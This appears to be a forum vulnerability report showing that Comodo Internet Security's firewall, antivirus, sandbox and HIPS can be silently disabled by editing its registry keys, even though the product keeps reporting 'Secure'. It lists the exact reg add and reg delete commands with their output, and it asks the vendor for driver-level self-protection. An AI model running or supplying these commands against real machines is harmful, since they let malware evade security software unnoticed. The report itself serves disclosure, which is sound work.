Programs or user-intruder can imperceptibly disarm CIS security subsystems with the backdoor by modifying the CIS configuration and even if it is password protected
in the following cases:
[ol]- Each app with admin rights marked (auto or manually) as Trusted in CIS when CIS(AutoSandbox,HIPS):on & UAC:on
- Each app marked (auto or manually) as Trusted in CIS when CIS(AutoSandbox,HIPS):on & UAC:off
- Each app with admin rights when CIS(AutoSandbox,HIPS):off & UAC:on
- Any app when CIS(AutoSandbox,HIPS):off & UAC:off
- An user action from terminal or .reg import on an administrator account.
- Probably also remotely from another computer on the local network when RemoteRegistry service is started.[/ol]
Some examples:
[ol]- Insidious modify the predefined factory firewall ruleset named “Blocked Application”
I can read the rule details from cmd:
C:\Windows\system32>reg query HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\0\Firewall\Predefined\4\Rules\0
UID REG_SZ {8CA7CD91-648B-4A1D-AB2A-7711A6BC73F8}
Days REG_DWORD 0x7f
StartHour REG_DWORD 0x0
StartMinute REG_DWORD 0x0
StopHour REG_DWORD 0x0
StopMinute REG_DWORD 0x0
Index REG_DWORD 0x0
Protocol REG_DWORD 0x1
Action REG_DWORD 0x6
Direction REG_DWORD 0x3
Description REG_SZ Block All Incoming and Outgoing Requests
Hacking the rule:
C:\Windows\system32>reg add HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\0\Firewall\Predefined\4\Rules\0 /v Action /t REG_DWORD /d 0x1 /f
The operation completed successfully.
Now, after system restart all firewall rules based on ruleset “Blocked Application” will works as “Allowed Application”
- Annihilation of the anti-virus module
Details of the factory ExcludedApplication rule for SearchIndexer.exe:
C:\Windows\system32>reg query HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\0\AV\Settings\ExcludedApplications\0
UID REG_SZ {C948AB6C-9E2D-43BA-8EDD-41FCD05D8344}
Flags REG_DWORD 0x0
Filename REG_SZ C:\Windows\system32\SearchIndexer.exe
DeviceName REG_SZ C:\Windows\System32\SearchIndexer.exe
Adding ALL files to excluded applications:
C:\Windows\system32>reg add HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\0\AV\Settings\ExcludedApplications\0 /v Filename /t REG_SZ /d . /f
Now, after system restart viruses will be undetectable.
- Disarmament of the automatic sandbox
C:\Windows\system32>reg delete HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\0\HIPS\Sandbox /f
After system restart all untrusted apps will run outside of the automatic sandbox.
- Disarmament of the HIPS
Details of the factory HIPS rule for %windir%\explorer.exe:
C:\Windows\system32>reg query HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\0\HIPS\Policy\2
UID REG_SZ {E20272F6-EB6C-4816-84EB-FC1C971B8388}
Flags REG_DWORD 0x2
Filename REG_SZ %windir%\explorer.exe
DeviceName REG_SZ C:\Windows\explorer.exe
Index REG_DWORD 0x2
TreatAs REG_SZ Windows System Application
ALL apps even untrusted will be treated as Windows System Application:
C:\Windows\system32>reg add HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\0\HIPS\Policy\2 /v Filename /t REG_SZ /d . /f
The operation completed successfully.
After system restart all untrusted apps will run freely without HIPS alerts.
I have recorded a short video showing the issue organoleptically Big scurity risk due to lack of CIS self-defense - YouTube
After the hacks the CIS Widget in spite of all indicates “Secure” on green and Support->Diagnostics returns “Diagnostics did not find any errors.”, despite the fact that CIS no longer protects you from anything.
After the hack the restart is not nesserasy if the user modifies anything in the settings and confirms by OK.
I think CIS should block read/write access to its own registry keys at the driver level, regardless of configuration.
Tested on guest Win10 x64 1803 in VMware Workstation 14, CIS clean install.